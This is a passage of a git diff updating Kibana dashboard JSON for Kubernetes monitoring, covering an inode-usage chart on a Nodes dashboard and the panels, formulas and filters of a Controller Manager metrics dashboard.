"5eef3516-509a-414c-b0ad-f6c8af1647bb", + "w": 24, + "x": 0, + "y": 59 + }, + "panelIndex": "5eef3516-509a-414c-b0ad-f6c8af1647bb", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-9d53c3bf-cefd-433d-a404-972717d0bb74", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "029a2917-cecd-4656-8c48-2ca1f66fcadd", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "9d53c3bf-cefd-433d-a404-972717d0bb74": { + "columnOrder": [ + "4d4a917d-07fa-4b5b-be50-5d09b7906ff5", + "890b120e-c1de-4501-8e37-336c75255d07", + "f3b6d48f-9098-43bf-b6f7-4a4713f93860", + "f3b6d48f-9098-43bf-b6f7-4a4713f93860X0", + "f3b6d48f-9098-43bf-b6f7-4a4713f93860X1", + "f3b6d48f-9098-43bf-b6f7-4a4713f93860X2" + ], + "columns": { + "4d4a917d-07fa-4b5b-be50-5d09b7906ff5": { + "dataType": "string", 
+ "isBucketed": true, + "label": "Top 10 values of kubernetes.node.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "029a2917-cecd-4656-8c48-2ca1f66fcadd", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "9d53c3bf-cefd-433d-a404-972717d0bb74": { - "columnOrder": [ - "4d4a917d-07fa-4b5b-be50-5d09b7906ff5", - "890b120e-c1de-4501-8e37-336c75255d07", - "f3b6d48f-9098-43bf-b6f7-4a4713f93860", - "f3b6d48f-9098-43bf-b6f7-4a4713f93860X0", - "f3b6d48f-9098-43bf-b6f7-4a4713f93860X1", - "f3b6d48f-9098-43bf-b6f7-4a4713f93860X2" - ], - "columns": { - "4d4a917d-07fa-4b5b-be50-5d09b7906ff5": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.node.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.name" - }, - "890b120e-c1de-4501-8e37-336c75255d07": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "f3b6d48f-9098-43bf-b6f7-4a4713f93860": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Inodes Usage Pct", - "operationType": "formula", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - }, - "formula": "average(kubernetes.node.fs.inodes.used)/max(kubernetes.node.fs.inodes.count)", - "isFormulaBroken": false - }, - "references": [ - "f3b6d48f-9098-43bf-b6f7-4a4713f93860X2" - ], - "scale": "ratio" - }, - 
"f3b6d48f-9098-43bf-b6f7-4a4713f93860X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Inodes Usage Pct", - "operationType": "average", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.node.fs.inodes.used" - }, - "f3b6d48f-9098-43bf-b6f7-4a4713f93860X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Inodes Usage Pct", - "operationType": "max", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.node.fs.inodes.count" - }, - "f3b6d48f-9098-43bf-b6f7-4a4713f93860X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Inodes Usage Pct", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "f3b6d48f-9098-43bf-b6f7-4a4713f93860X0", - "f3b6d48f-9098-43bf-b6f7-4a4713f93860X1" - ], - "location": { - "max": 76, - "min": 0 - }, - "name": "divide", - "text": "average(kubernetes.node.fs.inodes.used)/max(kubernetes.node.fs.inodes.count)", - "type": "function" - } - }, - "references": [ - "f3b6d48f-9098-43bf-b6f7-4a4713f93860X0", - "f3b6d48f-9098-43bf-b6f7-4a4713f93860X1" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "029a2917-cecd-4656-8c48-2ca1f66fcadd", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.node" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.node" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.name" + }, + "890b120e-c1de-4501-8e37-336c75255d07": { + "dataType": "date", + "isBucketed": true, + 
"label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "f3b6d48f-9098-43bf-b6f7-4a4713f93860": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Inodes Usage Pct", + "operationType": "formula", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 2 + } }, - "visualization": { - "layers": [ - { - "accessors": [ - "f3b6d48f-9098-43bf-b6f7-4a4713f93860" - ], - "layerId": "9d53c3bf-cefd-433d-a404-972717d0bb74", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "4d4a917d-07fa-4b5b-be50-5d09b7906ff5", - "xAccessor": "890b120e-c1de-4501-8e37-336c75255d07" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": true - } + "formula": "average(kubernetes.node.fs.inodes.used)/max(kubernetes.node.fs.inodes.count)", + "isFormulaBroken": false + }, + "references": [ + "f3b6d48f-9098-43bf-b6f7-4a4713f93860X2" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "f3b6d48f-9098-43bf-b6f7-4a4713f93860X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Inodes Usage Pct", + "operationType": "average", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.node.fs.inodes.used" + }, + "f3b6d48f-9098-43bf-b6f7-4a4713f93860X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Inodes Usage Pct", + "operationType": "max", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.node.fs.inodes.count" + }, + "f3b6d48f-9098-43bf-b6f7-4a4713f93860X2": { + "customLabel": true, + 
"dataType": "number", + "isBucketed": false, + "label": "Part of Inodes Usage Pct", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "f3b6d48f-9098-43bf-b6f7-4a4713f93860X0", + "f3b6d48f-9098-43bf-b6f7-4a4713f93860X1" + ], + "location": { + "max": 76, + "min": 0 + }, + "name": "divide", + "text": "average(kubernetes.node.fs.inodes.used)/max(kubernetes.node.fs.inodes.count)", + "type": "function" + } + }, + "references": [ + "f3b6d48f-9098-43bf-b6f7-4a4713f93860X0", + "f3b6d48f-9098-43bf-b6f7-4a4713f93860X1" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "029a2917-cecd-4656-8c48-2ca1f66fcadd", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.node" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 13, - "i": "5eef3516-509a-414c-b0ad-f6c8af1647bb", - "w": 24, - "x": 0, - "y": 59 + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.node" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "f3b6d48f-9098-43bf-b6f7-4a4713f93860" + ], + "layerId": "9d53c3bf-cefd-433d-a404-972717d0bb74", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "4d4a917d-07fa-4b5b-be50-5d09b7906ff5", + "xAccessor": "890b120e-c1de-4501-8e37-336c75255d07" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" }, - "panelIndex": "5eef3516-509a-414c-b0ad-f6c8af1647bb", - "title": "Filesystem Inodes usage by Node [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] Nodes", - "version": 1 - }, - "coreMigrationVersion": "8.6.0", - 
"created_at": "2023-01-11T13:56:20.011Z", - "id": "kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013", - "migrationVersion": { - "dashboard": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "c6bb8ec0-dae3-4438-ab76-0bff97321124:indexpattern-datasource-layer-4bf1dfdb-7a60-482d-88d4-130d598ac7bb", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c6bb8ec0-dae3-4438-ab76-0bff97321124:562d314a-8db1-4d85-9fcd-fe3224749cb2", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2a2da54b-f923-4b1f-b36c-0b1d283405b9:indexpattern-datasource-layer-28060f62-4880-4b1c-aef2-fe42f9df0c64", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2a2da54b-f923-4b1f-b36c-0b1d283405b9:3a819463-89ca-494a-9d6a-9e600dccf098", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f11dcb2d-3850-430c-b365-e925473ffe81:indexpattern-datasource-layer-f04e39cf-1a10-4841-86e3-53c07cb706df", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f11dcb2d-3850-430c-b365-e925473ffe81:53703bad-9449-489b-84bd-35c1c8a8d710", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "64187c9b-8038-47a3-b7df-6562d740840f:indexpattern-datasource-layer-98fe7b88-6346-4b74-b00d-dae2a5ce24f3", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "64187c9b-8038-47a3-b7df-6562d740840f:89318796-9c5f-41c0-be0f-5545f0012e08", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "b228c756-7cbd-4982-b61b-c6dbb78c1ced:indexpattern-datasource-layer-98fe7b88-6346-4b74-b00d-dae2a5ce24f3", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "b228c756-7cbd-4982-b61b-c6dbb78c1ced:862adc15-64b5-4dd6-a4e9-9bfc8538633d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "93d7f58a-ee13-4ca2-968a-a6c8bcf249a4:indexpattern-datasource-layer-bcb17062-e9f5-4da8-a132-7bdbffe8a740", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": 
"93d7f58a-ee13-4ca2-968a-a6c8bcf249a4:a21b3215-31e2-4ab3-b313-8fc7e77bed39", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "7c066a0c-0e3d-483d-a4fd-89dd6444d2d3:indexpattern-datasource-layer-bcb17062-e9f5-4da8-a132-7bdbffe8a740", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "7c066a0c-0e3d-483d-a4fd-89dd6444d2d3:87c6048e-20a6-401c-bf42-72ae034ee2fa", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "5c839f9c-a8bc-46e0-bd23-9300c03e6ed5:indexpattern-datasource-layer-98ce32f8-426f-43a8-8af5-81cf2f2e44b9", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "5c839f9c-a8bc-46e0-bd23-9300c03e6ed5:3b897101-bd76-444d-859e-60916d19dc02", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "5eef3516-509a-414c-b0ad-f6c8af1647bb:indexpattern-datasource-layer-9d53c3bf-cefd-433d-a404-972717d0bb74", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "5eef3516-509a-414c-b0ad-f6c8af1647bb:029a2917-cecd-4656-8c48-2ca1f66fcadd", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_57552b73-992a-46e6-9f21-9e07ca926a83:optionsListDataView", - "type": "index-pattern" + "preferredSeriesType": "area", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "controlGroup_6c029002-b266-42ef-af36-fdcd73bfadef:optionsListDataView", - "type": "index-pattern" - } + "title": "Filesystem Inodes usage by Node [Metrics Kubernetes]" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics Kubernetes] Nodes", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "c6bb8ec0-dae3-4438-ab76-0bff97321124:indexpattern-datasource-layer-4bf1dfdb-7a60-482d-88d4-130d598ac7bb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"c6bb8ec0-dae3-4438-ab76-0bff97321124:562d314a-8db1-4d85-9fcd-fe3224749cb2", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2a2da54b-f923-4b1f-b36c-0b1d283405b9:indexpattern-datasource-layer-28060f62-4880-4b1c-aef2-fe42f9df0c64", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2a2da54b-f923-4b1f-b36c-0b1d283405b9:3a819463-89ca-494a-9d6a-9e600dccf098", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f11dcb2d-3850-430c-b365-e925473ffe81:indexpattern-datasource-layer-f04e39cf-1a10-4841-86e3-53c07cb706df", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f11dcb2d-3850-430c-b365-e925473ffe81:53703bad-9449-489b-84bd-35c1c8a8d710", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "64187c9b-8038-47a3-b7df-6562d740840f:indexpattern-datasource-layer-98fe7b88-6346-4b74-b00d-dae2a5ce24f3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "64187c9b-8038-47a3-b7df-6562d740840f:89318796-9c5f-41c0-be0f-5545f0012e08", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b228c756-7cbd-4982-b61b-c6dbb78c1ced:indexpattern-datasource-layer-98fe7b88-6346-4b74-b00d-dae2a5ce24f3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b228c756-7cbd-4982-b61b-c6dbb78c1ced:862adc15-64b5-4dd6-a4e9-9bfc8538633d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "93d7f58a-ee13-4ca2-968a-a6c8bcf249a4:indexpattern-datasource-layer-bcb17062-e9f5-4da8-a132-7bdbffe8a740", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "93d7f58a-ee13-4ca2-968a-a6c8bcf249a4:a21b3215-31e2-4ab3-b313-8fc7e77bed39", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7c066a0c-0e3d-483d-a4fd-89dd6444d2d3:indexpattern-datasource-layer-bcb17062-e9f5-4da8-a132-7bdbffe8a740", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7c066a0c-0e3d-483d-a4fd-89dd6444d2d3:87c6048e-20a6-401c-bf42-72ae034ee2fa", + "type": "index-pattern" 
+ }, + { + "id": "metrics-*", + "name": "5c839f9c-a8bc-46e0-bd23-9300c03e6ed5:indexpattern-datasource-layer-98ce32f8-426f-43a8-8af5-81cf2f2e44b9", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "5c839f9c-a8bc-46e0-bd23-9300c03e6ed5:3b897101-bd76-444d-859e-60916d19dc02", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "5eef3516-509a-414c-b0ad-f6c8af1647bb:indexpattern-datasource-layer-9d53c3bf-cefd-433d-a404-972717d0bb74", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "5eef3516-509a-414c-b0ad-f6c8af1647bb:029a2917-cecd-4656-8c48-2ca1f66fcadd", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_57552b73-992a-46e6-9f21-9e07ca926a83:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_6c029002-b266-42ef-af36-fdcd73bfadef:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-bf9389f0-0c14-11ed-b760-5d1bccb47f56.json b/packages/kubernetes/kibana/dashboard/kubernetes-bf9389f0-0c14-11ed-b760-5d1bccb47f56.json index c4ecb49574f..a8f632aa1f8 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-bf9389f0-0c14-11ed-b760-5d1bccb47f56.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-bf9389f0-0c14-11ed-b760-5d1bccb47f56.json 
@@ -1,3187 +1,3209 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"f53d0d21-4502-4dce-8004-017a92104040\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"host.name\",\"title\":\"Host\",\"id\":\"f53d0d21-4502-4dce-8004-017a92104040\",\"selectedOptions\":[],\"enhancements\":{},\"singleSelect\":false}},\"df56c430-83b1-436e-8b9c-fb027aaa29ca\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster\",\"singleSelect\":true,\"id\":\"df56c430-83b1-436e-8b9c-fb027aaa29ca\",\"selectedOptions\":[],\"enhancements\":{}}}}" + "id": "kubernetes-bf9389f0-0c14-11ed-b760-5d1bccb47f56", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI1MiwyXQ==", + "attributes": { + "controlGroupInput": { + "controlStyle": "oneLine", + "chainingSystem": "HIERARCHICAL", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": 
"{\"f53d0d21-4502-4dce-8004-017a92104040\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"host.name\",\"title\":\"Host\",\"id\":\"f53d0d21-4502-4dce-8004-017a92104040\",\"selectedOptions\":[],\"enhancements\":{},\"singleSelect\":false}},\"df56c430-83b1-436e-8b9c-fb027aaa29ca\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster\",\"singleSelect\":true,\"id\":\"df56c430-83b1-436e-8b9c-fb027aaa29ca\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "Kubernetes Controller Manager metrics", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.controllermanager" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": { + "query": "kubernetes.controllermanager" + } + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": true, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 10, + "i": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", + "w": 23, + "x": 0, + "y": 0 + }, + "panelIndex": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "### Controller Manager\n\nThis dashboard collects metrics from [kube 
controller manager](https://kubernetes.io/docs/concepts/overview/components/#kube-controller-manager) endpoint. Its purpose is to give an overview of what is happening inside it through the controller processes metrics and detect problems that might be happening. \n\n**WARNING**: This dataset **requires access** to the kube controller manager endpoint. Refer [here](https://docs.elastic.co/en/integrations/kubernetes#scheduler-and-controllermanager) to learn how to enable it. In some \"As a Service\" Kubernetes implementations, like GKE or AKS, it is **not possible** to access its metrics.", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" + } + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", + "w": 25, + "x": 23, + "y": 0 }, - "description": "Kubernetes Controller Manager metrics", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ + "panelIndex": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + "background_color": "rgba(203,228,249,1)", + "drop_last_bucket": 0, + "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", + "index_pattern_ref_name": "metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", + "interval": "", + "isModelInvalid": false, + "markdown": "Cluster nodes", + "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI 
Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", + "markdown_vertical_align": "middle", + "max_lines_legend": 1, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "formatter": "default", + "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", + "line_width": 1, + "metrics": [ { - "$state": { - "store": "appState" + "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", + "type": "count" + } + ], + "override_index_pattern": 0, + "palette": { + "name": "default", + "type": "palette" + }, + "point_size": 1, + "separate_axis": 0, + "series_drop_last_bucket": 0, + "split_mode": "everything", + "stacked": "none", + "time_range_mode": "entire_time_range" + } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "", + "time_range_mode": "entire_time_range", + "tooltip_mode": "show_all", + "truncate_legend": 1, + "type": "markdown", + "use_kibana_indexes": true + }, + "title": "", + "type": "metrics", + "uiState": {} + }, + "type": "visualization" + }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 7, + "i": "aef813b5-85d5-46c9-a86a-2e273806d488", + "w": 25, + "x": 23, + "y": 3 + }, + "panelIndex": "aef813b5-85d5-46c9-a86a-2e273806d488", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-239b73ac-0fc9-44fd-a7c5-2d0281e6b765", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "239b73ac-0fc9-44fd-a7c5-2d0281e6b765": { + "columnOrder": [ + "310bfe34-31c8-4c52-bff0-60450318be7e", + "28f81466-455c-469d-8c35-b53555ae5e8a", + "363b1795-4ab4-43e8-87a6-fafe691bddf2", + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3", + 
"6b1f578b-3e83-443b-a2da-b97ecbcd67bb", + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X2", + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X1", + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X0", + "363b1795-4ab4-43e8-87a6-fafe691bddf2X0", + "6b1f578b-3e83-443b-a2da-b97ecbcd67bbX0" + ], + "columns": { + "28f81466-455c-469d-8c35-b53555ae5e8a": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Zone", + "operationType": "terms", + "params": { + "missingBucket": true, + "orderBy": { + "fallback": true, + "type": "alphabetical" + }, + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "kubernetes.controllermanager.zone" + }, + "310bfe34-31c8-4c52-bff0-60450318be7e": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Cluster", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" + }, + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "orchestrator.cluster.name" + }, + "363b1795-4ab4-43e8-87a6-fafe691bddf2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total nodes", + "operationType": "formula", + "params": { + "formula": "last_value(kubernetes.controllermanager.node.collector.count, kql='kubernetes.controllermanager.node.collector.count: *')", + "isFormulaBroken": false + }, + "references": [ + "363b1795-4ab4-43e8-87a6-fafe691bddf2X0" + ], + "scale": "ratio" + }, + "363b1795-4ab4-43e8-87a6-fafe691bddf2X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.node.collector.count: *" + }, + "isBucketed": false, + "label": "Part of Total nodes", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": 
"kubernetes.controllermanager.node.collector.count" }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.controllermanager" + "6b1f578b-3e83-443b-a2da-b97ecbcd67bb": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Node evictions", + "operationType": "formula", + "params": { + "formula": "last_value(kubernetes.controllermanager.node.collector.eviction.count, kql='kubernetes.controllermanager.node.collector.eviction.count: *')", + "isFormulaBroken": false + }, + "references": [ + "6b1f578b-3e83-443b-a2da-b97ecbcd67bbX0" + ], + "scale": "ratio" + }, + "6b1f578b-3e83-443b-a2da-b97ecbcd67bbX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.node.collector.eviction.count: *" + }, + "isBucketed": false, + "label": "Part of Node evictions", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.node.collector.eviction.count" + }, + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unhealthy nodes", + "operationType": "formula", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 1 + } }, - "type": "phrase" + "formula": "last_value(kubernetes.controllermanager.node.collector.unhealthy.count, kql='kubernetes.controllermanager.node.collector.unhealthy.count: *')/last_value(kubernetes.controllermanager.node.collector.count, kql='kubernetes.controllermanager.node.collector.unhealthy.count: *')*100", + "isFormulaBroken": false + }, + "references": [ + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X2" + ], + "scale": "ratio" + }, + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X0": { + "customLabel": true, + "dataType": "number", + 
"filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.node.collector.unhealthy.count: *" + }, + "isBucketed": false, + "label": "Part of Unhealthy nodes", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.node.collector.unhealthy.count" }, - "query": { - "match_phrase": { - "data_stream.dataset": { - "query": "kubernetes.controllermanager" - } + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.node.collector.unhealthy.count: *" + }, + "isBucketed": false, + "label": "Part of Unhealthy nodes", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.node.collector.count" + }, + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Unhealthy nodes", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + { + "args": [ + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X0", + "c3ae8ff0-53ae-4da5-9521-b9467df47ed3X1" + ], + "name": "divide", + "type": "function" + 